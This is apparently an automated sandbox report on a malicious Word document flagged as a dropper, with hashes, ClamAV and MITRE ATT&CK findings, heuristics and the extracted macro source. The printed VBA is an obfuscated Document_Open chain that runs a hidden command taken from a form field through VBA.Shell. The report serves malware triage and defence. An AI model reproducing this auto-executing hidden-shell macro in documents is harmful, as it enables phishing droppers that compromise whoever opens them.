Office (OOXML) malware analysis — malicious · 27bfe27a4f0fe8da

MALICIOUS

Office (OOXML)

95.2 KB Created: 2019-02-25 18:08:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-02-26

MD5: 2f38493885e8008f32c048958a2cdeda SHA-1: 3b623b3085213362add7008af21248c134090386 SHA-256: 27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro with a Document_Open auto-execution function. This macro utilizes the Shell() function to execute an unknown command, likely downloading and running a second-stage payload. ClamAV signatures confirm this behavior, identifying it as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6883535-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6883535-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2592 bytes
SHA-256: `910eab768212bd3734f1f2d66d6d929c258419153fe10cd2dc2d345d6693549a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function run(FW4F9uTg) FSE7uWQV = VBA.Shell(FW4F9uTg, 0) Dim Culyp As Long Culyp = Sgn(0) If Len("H8gfqRkxs") <> 247 Then ' Else MsgBox "aWMEGv", 32, "vuK2IT" End If Dim JLRm95WQN As Long JLRm95WQN = Sgn(-1509511124) End Function Sub Document_Open() Dim Zf9D1OKe As Double Zf9D1OKe = Round(31894.571303004) Dim IcjK5H As Double IcjK5H = 58588.983303507 GJDNG = 29988 / 84 rYrdz7KAu = -7258 + 7262 If GJDNG = rYrdz7KAu Then rqIwil0 = "YJnAc0UWl" End If Dim MXdkC5bmD As Integer MXdkC5bmD = -21678 Call z End Sub Sub Document_Close() End Sub Attribute VB_Name = "PrB6AHpUc" Sub U9CMXcfb() End Sub Function a8CY0UhD() As Integer Dim pOV3njYgy As Boolean pOV3njYgy = False Dim sPhgs As Integer Dim bua38yCw As Integer PhD1Sa = Mid("v9SJvxMqSb9uk7Xsg8Kp65Um", -13533 + 13535, 5094 - 5089) Vk7WGFmp = PhD1Sa Dim QXyHT As Single QXyHT = Round(53717.722632021) sPhgs = 12222 / 291 bua38yCw = 15 a8CY0UhD = sPhgs - bua38yCw End Function Public Sub z() Dim N96oJTWvn As Integer N96oJTWvn = Sgn(-26980) Dim Qj98qx As Byte Qj98qx = 136 Dim mZTWkC As Boolean mZTWkC = True Dim aGxePu4y As Integer aGxePu4y = 7510 OsKGEt = 10750 / 43 ORHd7J = -20210 + 20211 If OsKGEt = ORHd7J Then hpxdhYZG = "zOKr2" End If Dim I8073 As Double I8073 = Int(64041.156238735) Dim fxhpz9M As Boolean fxhpz9M = True ThisDocument.run rFODa4o Dim a92SETKmO As Long a92SETKmO = Sgn(-1072668940) End Sub Attribute VB_Name = "opnJEa" Sub NleSKE1(UKHxk) End Sub Attribute VB_Name = "wOt0NkD" Function iSLgWMDBc() As Integer Dim l0hguz6 As Boolean l0hguz6 = False Dim XRASNmGV As Integer Dim rDsafHk As Long XRASNmGV = 100 rDsafHk = 33 iSLgWMDBc = XRASNmGV - rDsafHk End Function Public Function rFODa4o() Set gT5EL = New fm Dim H2CeQF6Oh As Integer H2CeQF6Oh = Sgn(30755) RXbLTC = 394 - 94 BNm9BQw = -8819 + 8821 If RXbLTC = BNm9BQw Then MuYmp8N6T = "CgihroP" End If rFODa4o = gT5EL.txt.Text End Function Attribute VB_Name = "fm" Attribute VB_Base = "0{94E04F09-DE34-4658-9882-E940DCA7633A}{9D636157-66FD-4060-9DFB-F03239176D44}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	25088 bytes
SHA-256: `2b7c1942b63983a38d396c6e3dba719d08dd203efae61137c7d84ff05e6d9ece`
Detection ClamAV: Doc.Dropper.Agent-6883535-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.